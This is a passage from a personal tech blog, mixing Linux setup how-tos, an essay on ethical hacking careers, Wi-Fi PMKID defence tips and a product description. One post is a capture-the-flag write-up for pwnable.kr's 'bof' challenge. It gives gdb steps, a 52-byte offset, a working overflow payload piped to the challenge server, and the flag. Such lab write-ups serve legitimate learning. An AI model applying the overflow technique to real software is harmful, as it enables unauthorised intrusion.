Wednesday, January 16, 2019

HOWTO : Fix Ubuntu Cannot Reboot With Command Properly

When you have an UEFI BIOS on your computer and installed with Ubuntu, you may encounter the computer cannot be reboot with command properly. We can fix it by the following method.

sudo nano /etc/default/grub

Locate the following line :

GRUB_CMDLINE_LINUX=""

and replaces it with :

GRUB_CMDLINE_LINUX="reboot=efi"

After that, run the following command and reboot with command :

sudo update-grub

sudo reboot


That's all! See you.


Tuesday, January 15, 2019

HOWTO : Fix Temporary Failure In Name Resolution On Ubuntu 18.04.1

If you are using Ubuntu 18.04.1 Server version, you may encounter a ping problem. That is, you can ping with IP address but cannot ping with domain name. We can fix this problem by the following method.

sudo mv /etc/resolv.conf /etc/resolv.conf-original
sudo ln -s /run/systemd/resolve/resolv.conf /etc/resolv.conf
sudo systemctl restart systemd-resolved


You can ping with domain name now.

That's all! See you.


Wednesday, January 09, 2019

如何成為黑客 (入門篇)


甚麼是黑客?

黑客 (Hacker) 一般是指技術精湛的人,能令設備做出一些不在設計情況之下運作。

在資訊科技安全領域下,黑客是指一個具有精湛電腦技術的人,能使電腦或其程式於不在其設計的情況下運作。在我等來說,黑客有分黑帽子 (Black Hat),白帽子 (White Hat),灰帽子 (Grey Hat) 及腳本小子 (Script Kiddies)。

黑帽子是指所謂駭客 (Cracker),他們是作奸犯科之流,但技術精湛。

白帽子是指資訊科技安全專家或硏究員,他們測試系統漏洞,並公報結果給有關開發人員或機構。

灰帽子也是資訊科技安全專家或硏究員,他們也測試系統漏洞,但他們大多數不會向有關開發人員或機構公報其發現,他們會直接披露 (Full Disclosure)。他們多數走在法律邊緣,但並沒有惡意。

至於腳本小子,他們並不是資訊科技界中人。他們會利用黑客工具作樂或者作惡。


為何要成為黑客?

無論你是作業系統開發員、應用系統開發員、程式設計員、系統管理員或者是普通的用戶,都需要學習黑客的知識和技術。當你明白黑客的攻擊是如何進行的話,你就會知道如何去防禦了。正所謂「未知攻,焉知防」。

再者,當完成編寫程式後,可以自行進行滲透測試 (Penetration Testing),以確保製成品沒有明顯的高危漏洞。


黑客的基本要求

黑客必須具有一定的英語水平,因為大多數的技術文獻都是用英語撰寫的。黑客也必須具有基本的編程能力,如 C、PHP 或 Python 等語言。除此之外,黑客也必須略懂網絡知識和技術。最後亦都是最重要的,黑客更必須具有創意的頭腦,思路不會被既有的框架所束縛。

當然,黑客要對各個版本的微軟視窗有所認識,這亦包括伺服器版本。除此之外,黑客亦會對 Linux、Unix (BSD 和 macOS 等) 有所了解。


學習與實習平台

網絡上有很多的實習的平台,有的是在綫上進行,有的是在綫下進行。有的需要付費的,但大多數都是免費的。以下是一些比較知名的平台:

(一) Hack The Box (綫上,付費或免費,要求有一定的基本能力方可注册);
(二) VulnHub (綫下,免費)。

網上有很多黑客技術的演練,大多是文章或視頻。比較知名的視頻為 IppSec 的 YouTube 視頻。

國內和國外有很多高質素的滲透測試書籍,我們可以從中可以學習到很多資訊科技安全的知識。網絡上也不乏高質素的資源可供存取。


認證與否?

如果你要在這個行業打滾的話,我建議考取一些認證。但如果你只是業餘又或者是賞金獵人 (Bug Bounty Hunter) 的話,有否認證並沒有必然關係。當然,如果有認證的話,在聲譽上就比較完美了。

比較知名的賞金獵人平台:

(一) HackerOne
(二) BugCrowd

至於認證方面,在中國香港可以考到的認證,而且在香港具有知名度的有:

(一) OSCP (在廿三小時四十五分內完成,是實戰型試題;在家裏應試,但會被監察);
(二) CEH (在四小時內完成,是選擇題試題);
(三) CEH (Practical) (在六小時內完成,是實戰型試題);
(四) CISSP (在三小時內完成,是選擇題試題)。

OSCP 和 CEH 是滲透測試的範疇,而 CISSP 是資訊科技安全管理的範疇。


結論

要成為黑客,我們需要多閱讀和多實踐,以確保認識和了解相關技術。但最重要的是不要觸犯法律,每個人都要對自己的行為負責。未經他人書面授權,不可以對他人作出滲透測試,否則將會當郎入獄,前途盡毀。

Samiux
OSCE OSCP OSWP
寫於二零一九年一月九日,中國香港


Wednesday, January 02, 2019

HOWTO : Protect from being attacked by PMKID attack

On Aug 04, 2018, the developer of hashcat discovers a new way to attack WPA/WPA2 Wifi, namely PMKID attacks, when he is going to find a new way to attack new WPA3. This attack requires no Wifi user attached to the Wifi router and no need 4-way handshake. Meanwhile, almost all modern Wifi routers are vulnerable to this attack.

I conducted a quick test on my living area recently and found all Wifi routers (including mine) are vulnerable to this attack. If working with hashcat and/or good dictionaries properly, the WPA PSK (pre-Shared Key) password can be obtained without any problem.

Comes to the conclusion, WPA2 is no longer safe!

However, we can protect our Wifi by following methods :

(1) Make the WPA PSK password as complex and as long as possible (mine is 26 characters long);
(2) Make sure the WPA PSK password cannot be found in the available dictionaries (such as rockyou);
(3) Make sure your Wifi router can prevent ARP spoofing (Address Resolution Protocol) or apply MAC address filtering when possible;
(4) If possible, change your WPA PSK password at least once a month; and
(5) Keep your Wifi signal as weak as possible. Yes, makes it as weak as possible.

Reference

[1] New attack on WPA/WPA2 using PMKID
[2] Youtube PMKID attack Demo

That's all! See you.


Friday, December 14, 2018

HOWTO : Solution of bof at Toddler's Bottle

Toddler's Bottle is one of the CTF games at pwnable.kr website. I am going to do the game is namely bof. There are already many writeups in the internet. However, I am going to explain what I learnt from this game.

Website : http://pwnable.kr/play.php (Select bof)
Source Code : http://pwnable.kr/bin/bof.c
Binary : http://pwnable.kr/bin/bof

Exploit Server : pwnable.kr:9000

The source code of the bof binary is provided. I examine the source code and found out that we are going to replace the "key" from "0xdeadbeef" to "0xcafebabe". The "overflowme" variable is 32 characters long. No matter what you entered in the "overflowme" variable, the "key" is not changed as it is hard coded. It is a buffer overflow challenge. However, we are not going to take control of the return address this time.



Load the gdb with PEDA and check with "checksec". It is confirmed that the NX is enabled with another restrictions.

gdb -q ./bof



Run "disass main" to disassemble the "main" function.

disass main



Run "disass func" to disassembe the "func" function.

disass func



In the "func" function, the following codes that I am interested in.

0x00000649 <+29>:    lea  eax,[ebp-0x2c]
0x0000064c <+32>:    mov  DWORD PTR [esp],eax
0x0000064f <+35>:    call 0x650
0x00000654 <+40>:    cmp  DWORD PTR [ebp+0x8],0xcafebabe
0x0000065b <+47>:    jne  0x66b

The "eax,[ebp-0x2c]", "ebp-0x2c" may be contained the value of "overflowme" variable and saved in eax register.

The "DWORD PTR [ebp+0x8],0xcafebabe", "ebp+0x8" may be contained the value of "key", that is "0xdeadbeef".

I am going to set a breakpoint at "0x0000065b <+47>".

b *func+47



Then "r" run the program and is prompted for entering "helloworld" as the "overflowme".



After entering the "helloworld", I am going to examine the "eax" and "ebp+0x8".

x/x $ebp+0x8
x/s $eax




The result confirmed what I suspected. I am going to check the offset the two addresses with Python. The offset is 52.



Once get the offset, I am going to overwrite the "0xdeadbeef" with "0xcafebabe" with the exploit code. The "cat" command is for the interactive with the shell.

(python -c 'print "A"*52 + "\xbe\xba\xfe\xca"'; cat -) | nc pwnable.kr 9000



The flag is :

daddy, I just pwned a buFFer :)




That's all! See you.


Friday, December 07, 2018

HOWTO : Flash Player on Kali Linux 2018.4

Kali Linux 2018.4 does not come with latest version of Flash Player. Since Flash Player may be vulnerable, we need to keep it to be updated. However, most tutorials in the internet teach you copy the Flash Player object file (libflashplayer.so) to /usr/lib/mozilla/plugins/ only. It is very hard to keep track the latest update this way. The following method may be the best way to install Flash Player on Kali Linux 2018.4. It works for Firefox and Chrome as well as Chromium.

Step 1 :

apt update
apt install browser-plugin-freshplayer-pepperflash pepperflashplugin-nonfree


Step 2 :

Go to https://github.com/cybernova/fireflashupdate to download fireflashupdate.sh

wget https://raw.githubusercontent.com/cybernova/fireflashupdate/master/fireflashupdate.sh

chmod +x fireflashupdate.sh
./fireflashupdate.sh


Step 3 :

To update Flash Player :

./fireflashupdate.sh

Step 4 :

You may need to change the settings at Preferences menu of Firefox Add-ons - Plugins - Shockwave Flash from "Ask to Activate" to "Always Activate".

That's all! See you.


Thursday, December 06, 2018

HOWTO : Virtualbox 5.2.22 on Kali Linux 2018.4

The current version of Virtualbox for Kali Linux 2018.4 is the latest verion 5.2.22. Since the official version of Virtualbox cannot be installed on Kali Linux, the Kali version is to be installed. Luckily, it is the latest version.

apt update
apt install virtualbox-dkms virtualbox-ext-pack virtualbox-guest-additions-iso


That's all! See you.


Monday, November 26, 2018

HOWTO : nVidia and HashCat on Kali Linux 2018.4

CPU : Intel i7-8750H (6-core with HyperThreading and Graphic Display)
Extra Graphic Display : nVidia GTX 1060 (laptop)

There are two display graphic cards on the same system, namely Optimus on laptop. The installation of nVidia display driver on Kali Linux 2018.4 is difference to Ubuntu 18.04.1 on the same system. You can refer to the link here for Ubuntu 18.04.1 even they are using the same version of nVidia display driver - Version 390.87 at the time of this writing.

Step 1 :

apt updaate
apt install nvidia-kernel-dkms primus bumblebee bbswitch-dkms nvidia-smi


Step 2 :

Reboot the system.

To confirm the installation.

nvidia-smi

Step 3 :

Install HashCat which does not require CUDA.

apt install hashcat-nvidia

Step 4 (optional) :

To install CUDA.

apt install nvidia-cuda-toolkit

To run program that requires CUDA.

bumblebeed --daemon
optirun [program]


That's all! See you.


Friday, October 26, 2018

HOWTO : Tensorflow 1.11.0 on Ubuntu 18.04.1 LTS with Anaconda3 5.3.0

Install Anaconda3 which is Python 3. The current version of Python is 3.7.x at Anaconda3.

sudo apt install build-essential libssl-dev libffi-dev python3-dev

wget https://repo.continuum.io/archive/Anaconda3-5.3.0-Linux-x86_64.sh

chmod +x Anaconda3-5.3.0-Linux-x86_64.sh

./Anaconda3-5.3.0-Linux-x86_64.sh

Install anaconda3 to /home/samiux/anaconda3 (current user, samiux) and then answer "yes" to allow change the .bashrc of samiux. (replace "samiux" with your username)

source /home/samiux/.bashrc

Update Anaconda3.

conda update --prefix /home/samiux/anaconda3 anaconda
conda update -n base conda


Since current Tensorflow 1.11.0 only supports Python 3.6 for Python 3.x, we need to install Python 3.6 at the virtual environment for Tensorflow.

conda create -n venv pip python=3.6
conda install tensorflow -n venv


To activate the virtual environment, that is Python 3.6.

conda activate venv

To deactivate it when not using Python 3.6 and Tensorflow.

conda deactivate

To test the Tensorflow installation.

(venv) samiux@ubuntu:~$ python -c "import tensorflow as tf; print(tf.__version__)"

It will display the current version of Tensorflow. The current version of Tensorflow as at this writing is 1.11.0.

1.11.0

That's all! See you.


Sunday, October 21, 2018

China - No Wallet

China's Great Leap to Wallet-Free Living - Moving Upstream

Amazing China: Mobile Payments Change Way of Life in China

Amazing China: Crazy mobile payment in China

Sunday, September 09, 2018

Croissants - Intrusion Detection and Prevention System

牛角麵包 - 防禦入侵系統

牛角麵包 (Croissants) 是一項開源項目,但有一項同名的項目是商業版本的,開源版本的名字為牛角麵包 (社區版,Community Edition)。收費版本具有禦防網絡掃描器的偵測和推送更新的技術,其他的與開源版本大致是一樣的。

牛角麵包與統一威脅管理系統 (Unified Threat Management System, UTM) 和下世代防火牆 (Next Generation Firewall, NG Firewall) 有相當程度是相若的,不同的只是牛角麵包並沒有防火牆。

牛角麵包是由黑客設計與開發出來對付黑客的一個系統,不論他們是道德黑客或者是惡意黑客。

開源版的特性 :

她具有統一威脅管理系統和下世代防火牆的大部份特性,例如防禦漏洞利用、防止病毒攻擊、惡意網絡地址黑名單、防禦惡意軟件攻擊、惡意網頁攻擊過濾、防止洋蔥網絡 (Tor) 瀏覽、防止有敵意的網絡流量、偵測網絡掃描器掃描等。

至於效能方面,她有極低延遲性的特點,有效地提高網絡遊戲的可玩性,而且能夠有效地播放 4K 的多媒體,她更能夠處理大約 40GB 或以上的流量,當然這也與硬件的規格有相當大的關係。

至於配置方面,她幾乎可以配置在網絡中的任何位置,包括網外和網內。如果再配合奧德拉 (Audra) (偵測入侵系統),這樣每個網段都涵蓋得到。奧德拉也是基於牛角麵包 (社區版) 而設計的偵測入侵系統,其元件是完全一樣的。

收費版的特性 :

除了具有社區版的功能外,她還有推送更新技術,如遇緊急情況,可以立刻對牛角麵包作出遠端更新,以求達到防禦入侵的最佳效果。

另外她還可以擋格所有網絡掃描器的偵測,令黑客不能有效地得到意圖入侵目標的資訊,從而未能有效地作出攻擊。如果盲目地作出攻擊,這是徒勞無功的。這樣就可以防止或延遲被入侵的可能性,這功能特別適合於有伺服器配置在網絡中的環境。

Samiux
OSCE OSCP OSWP


************


Croissants - Intrusion Detection and Prevention System

Croissants is an open source project and commercial project at the same time. Open source project is namely Croissants (Community Edition, CE) while commercial one is Croissants. Croissants and Croissants CE are almost the same. However, Croissants has some outstanding technique, such as push update and upgrade as well as blocking network scanning.

Croissants is very similar with Unified Threat Management System (UTM) and Next Generation Firewall (NG Firewall). However, Croissants does not have firewall anyway.

Croissants is designed by a hacker to defend against hackers. He knows what hackers are doing and thinking, regardless of whether they are ethical or malicious.

Croissants CE Features :

Croissants CE has similar features as UTM and NG Firewall, such as preventing vulnerabilities exploits, anti-virus, malicious IP address blacklisting, preventing malicious software, filtering web page attacks, preventing Tor network from being accessed, blocking malicious traffic, detecting network scanning, and etc.

It is an ultra-low latency system which is ideal for demanding online games and 4K video streaming. The maximum bandwidth of Croissants is over 40GB which is depending on the hardware configuration.

Croissants CE can be placed at any place in the network which is including outside and inside the network segments. When implemented with Audra (Intrusion Detection System), the traffic monitoring in the network can be covered completely. Meanwhile, Audra is designed based on Croissants CE.

Croissants Features :

Croissants has all the features as Croissants CE but it also has push update and upgrade features. It provides an emergency update or upgrade in order to provide a better protection to the network when needed.

In addition, it also can block network scanning. Once the scanning is blocked, hackers cannot obtain the information of the services and ports of the network/servers. They cannot launch any attack to the network blindly. You can be prevent from being attacked or delay of being attacked as a result. Croissants is ideal for network that providing connections to the public.

Samiux
OSCE OSCP OSWP

Reference

InfoSec Ninjas 资安忍者


Sunday, August 26, 2018

HOWTO : Intel and nVidia GPUs on Ubuntu 18.04.1 LTS

The version of nVidia driver for Ubuntu 18.04.1 is 390 at the time of this writing. You have 3 methods to switch between Intel GPU and nVidia GPU. However, these require your box to reboot or relogin to make the change effect.

(A) nVidia Driver Install

sudo apt install bbswitch-dkms nvidia-dkms-390 nvidia-driver-390 nvidia-headless-390 nvidia-kernel-common-390 nvidia-prime nvidia-settings nvidia-utils-390 xserver-xorg-video-nvidia-390 nvidia-cuda-toolkit

Method 1 - Reboot is required
nvidia-settings

Select nVidia GPU or Intel GPU from "Prime" on the menu. After that, reboot your box.

This method is working only when nVidia driver is loaded. You need to reboot your box to make the change effect.

To confirm the change :

prime-select query

Method 2 - Reboot is required

To change to Intel GPU :

You need to reboot your box to make the change effect.

sudo prime-select intel

To change to nVidia GPU :

sudo prime-select nvidia

You need to reboot your box to make the change effect.

To check the settings :

prime-select query

Method 3 - Relogin is required

To install modified version of prime-select :

sudo apt install git rustc cargo lightdm
git clone https://github.com/matthieugras/Prime-Ubuntu-18.04

cd Prime-Ubuntu-18.04
cd prime_socket/src
sudo make install


The "prime-select" binary is located at /usr/local/bin.

Rename the original "prime-select" :

sudo mv /usr/bin/prime-select /usr/bin/prime-select-original

Change to lightdm :

sudo dpkg-reconfigure gdm3

Select lightdm and then reboot the box.

Prime sync for tear free laptop panel

sudo nano /etc/modprobe.d/zz-nvidia-modeset.conf

Add the following lines :

# enable prime-sync
options nvidia-drm modeset=1


Then run the following command and then reboot your box :

sudo update-initramfs -u

To change to Intel GPU :

sudo prime-select intel

The box will force you to logout and awaiting for your re-login.

To change to nVidia GPU :

sudo prime-select nvidia

The box will force you to logout and awaiting for your re-login.

To check the settings :

prime-select query

(B) Optional

To check what nVidia driver version is installed :

ubuntu-drivers devices

To auto install the nVidia driver :

sudo ubuntu-drivers autoinstall

(C) Conclusion

To set to Intel GPU for power saving while nVidia GPU for performance. For Kali Linux or Parrot Security OS users, I recommended to use Method 2 after installed the nVidia driver. The package name of nVidia driver for Kali Linux and Parrot Security OS are different from Ubuntu 18.04.1 LTS. When using Method 3, the Intel display card cannot be video properly. However,, Method 2 has no such problem.

That's all! See you.


Thursday, August 09, 2018

滲透測試與奪旗賽

初次接觸奪旗賽 (Capture The Flag) 比賽項目,發覺其與真實的滲透測試 (Penetration Testing) 相差甚遠。以奪旗賽練習網站中的網頁 (Web) 題目為例,奪旗賽題目會提供提示以供下一關的鑰匙,或者以這個提示來完成這條題目。但現實環境的網站滲透測試是沒有提示的,滲透測試員是要用自己的方法去盡量搜集這個網站的資訊來作進一步行動。再者,奪旗賽的題目大多是脫離現實,而且十分狡猾 (tricky)。

我個人認為如果一個專業的滲透測試員長期在奪旗賽題目中打滾浸淫,有可能影響其專業的思維和滲透測試的方式,並且在其專業知識上並沒有實際的獲益,但是閒來作為遊戲玩樂又未賞不可的。

至於奪旗賽中另一個比賽項目攻防戰,我仍未曾有機會接觸到,所以不會妄下判斷。因機緣巧合,最近在一個很爛的奪旗賽練習網站 (beta.ctflearn.com) 玩了一些我懂的題目,並且在一萬二千幾名玩家中排行第廿七 (二零一八年八月九日止)。在玩的過程中並未有學習到新鮮事物的感覺,非常可惜。

最後,我個人認為,如果要在滲透測試知識和技術上有實際的獲益,我想最有效的方法是參加懸賞計劃 (Bug Bounty) 了。如果可以發現漏洞並獲得獎金當然是一件樂事,但如果未能取得獎金都可以在一個合法的平台上練習,因為懸賞計劃中的項目全部都是真實的個案。

Samiux
OSCE OSCP OSWP